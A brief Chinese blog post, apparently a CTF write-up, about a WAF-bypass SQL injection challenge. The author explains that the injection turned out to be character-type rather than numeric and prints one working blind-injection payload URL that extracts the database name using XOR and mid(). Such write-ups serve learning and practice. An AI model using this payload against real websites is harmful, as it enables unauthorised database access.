标签:index.php 意思 老年人 比赛 tab 开始 字符 注入 过滤
长亭出题思路很广啊,666
是一道绕waf的题,一开始被欺骗以为是数字型注入,但过滤了很多很严格,最后才知道是字符型,哈哈哈,payload如下:
http://54.222.188.152:25718/index.php?id=1‘^(mid(database()from(1)for(1))in(0x77))^‘1#
看来以后还是要多打打比赛,老年人不练练思路跟不上啊
标签:index.php 意思 老年人 比赛 tab 开始 字符 注入 过滤
原文地址:http://www.cnblogs.com/sherlock17/p/7783445.html
